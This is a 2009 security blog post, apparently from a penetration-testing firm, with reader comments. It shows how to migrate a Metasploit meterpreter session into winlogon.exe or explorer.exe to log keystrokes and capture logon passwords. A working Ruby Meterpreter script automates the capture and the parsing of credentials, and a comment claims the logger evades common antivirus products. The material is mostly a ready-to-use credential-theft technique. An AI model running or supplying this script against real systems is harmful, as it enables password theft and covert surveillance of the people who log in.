Tuesday, March 24, 2009

Password Sniffing the Metasploit Way

H.D. Moore continues to kick some major bum with his recent updates to the Metasploit Framework. Most notable is the keystroke logger added to the meterpreter console. For those of you not aware of what meterpreter is, it's a payload that gets delivered to the system somehow (e.g. through a buffer overflow, a malicious executable, etc.) and is really a Swiss army knife for post-exploitation. With the latest svn update you can migrate into an already running process like winlogon.exe (the process that handles interactive logon) and capture the keystrokes of everyone who logs into the system. Pretty sweet stuff. I got to play with it this afternoon and it's extremely simple; once in the meterpreter console, do the following:

meterpreter > ps

Process list

 PID  Name          Path
 ---  ----          ----
 401  winlogon.exe  \??\C:\WINNT\system32\winlogon.exe

meterpreter > migrate 401

[*] Migrating to 401...
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer...

**** A few minutes later, after an admin logs in ****

meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!

In other words, the user typed Administrator into the username field, and ohnoes1vebeenh4x0red! is the password.

Of course this isn't limited to winlogon.exe: migrate into explorer.exe and you intercept the keystrokes of users who are already logged in, i.e. everything they type in their desktop session, not just credentials.
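The whole ps / migrate / keyscan_start / keyscan_dump sequence above, for both the winlogon.exe and the explorer.exe case, can be scripted. The script below is an added example, not code from the original post or from the Metasploit project. The live calls it makes (client.sys.process.get_processes, client.core.migrate, client.sys.ui.keyscan_start/keyscan_dump/keyscan_stop, print_status) are real Meterpreter script API names; the process list and the keystroke dump at the bottom are constructed to mirror the session shown above so the target-selection and parsing logic can be run offline. The <Tab>/<Return> marker format handled in split_credentials is an assumption about how the sniffer renders special keys; the post's own dump shows a plain space between username and password.

```ruby
# Added example (not from the original post or the Metasploit project):
# automates the winlogon.exe / explorer.exe keystroke capture as a
# Meterpreter script. Meterpreter API names used are real; the sample
# process list and dump below are constructed for offline use.

# Pick the PID to migrate into. `processes` has the shape that
# client.sys.process.get_processes returns: an array of hashes keyed by
# 'pid', 'name', 'path', 'session'. Several instances can exist (one
# winlogon.exe per logon session on a terminal server); prefer the one
# in `session` when given, otherwise the lowest PID. Returns nil if the
# process is not running, so the caller can bail out before migrating.
def pick_target_pid(processes, name, session = nil)
  matches = processes.select { |p| p['name'].to_s.casecmp(name).zero? }
  return nil if matches.empty?
  if session
    in_session = matches.select { |p| p['session'] == session }
    matches = in_session unless in_session.empty?
  end
  matches.min_by { |p| p['pid'] }['pid']
end

# Turn a keyscan_dump string into [user, password] pairs, one per line.
# Assumption: fields are separated by whitespace or by <Tab>/<Return>
# markers for special keys. Lines without two fields are skipped.
def split_credentials(dump)
  dump.each_line.map do |line|
    fields = line.gsub(/<(Tab|Return)>/i, ' ').split
    next if fields.length < 2
    [fields[0], fields[1]]
  end.compact
end

# Live path, meant to run inside a Meterpreter session where the
# framework supplies `client`: migrate, sniff for `wait` seconds,
# dump, stop the sniffer and parse what was captured.
def capture_logon_keys(client, name = 'winlogon.exe', wait = 300)
  pid = pick_target_pid(client.sys.process.get_processes, name)
  raise "#{name} not found in process list" unless pid
  client.core.migrate(pid) unless client.sys.process.getpid == pid
  client.sys.ui.keyscan_start
  sleep(wait)
  dump = client.sys.ui.keyscan_dump
  client.sys.ui.keyscan_stop
  split_credentials(dump)
end

# Constructed sample data mirroring the session in the post.
SAMPLE_PROCESSES = [
  { 'pid' => 4,    'name' => 'System',       'path' => '',                                      'session' => 0 },
  { 'pid' => 401,  'name' => 'winlogon.exe', 'path' => '\\??\\C:\\WINNT\\system32\\winlogon.exe', 'session' => 0 },
  { 'pid' => 1234, 'name' => 'explorer.exe', 'path' => 'C:\\WINNT\\explorer.exe',               'session' => 0 },
].freeze
SAMPLE_DUMP = "Administrator ohnoes1vebeenh4x0red!\n".freeze

if defined?(client)
  # Inside a Meterpreter session: do it for real against winlogon.exe.
  capture_logon_keys(client).each { |u, p| print_status("#{u} : #{p}") }
else
  # Offline: show which PID would be chosen and how the dump is parsed.
  puts "would migrate to PID #{pick_target_pid(SAMPLE_PROCESSES, 'winlogon.exe')}"
  split_credentials(SAMPLE_DUMP).each { |u, p| puts "#{u} : #{p}" }
end
```

To go after already logged-in users instead, call capture_logon_keys(client, 'explorer.exe'); the selection logic is the same, only the target name changes.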

More great stuff from the Metasploit framework, enjoy!


Matt Davis said...

Have you done any testing against AV, HIPS, or FIM to see if they detect this? Since I don't quite know how this 'injection' occurs, I figured I would ask.

jshmoe12 said...

This is a very interesting update for metasploit. H.D. Moore is a genius. I have been going to school for computer networking and I am very into computer security. H.D. has been a great role model in my journey through security. Also rel1k has been a great example of what clever minds can come up with. Keep up the great work securestate.


Dave Kennedy said...

jshmoe12, thanks a ton man! Thanks for the great feedback!

Dave Kennedy said...


When meterpreter gets loaded onto the system it's all done in memory; anti-virus at that point is pretty much useless. I have tested the keystroke logger against kaspersky, avg, and symantec without a prob :)

Dave Kennedy said...

Something like CSA should detect this since it hooks all system calls, but I cannot verify that.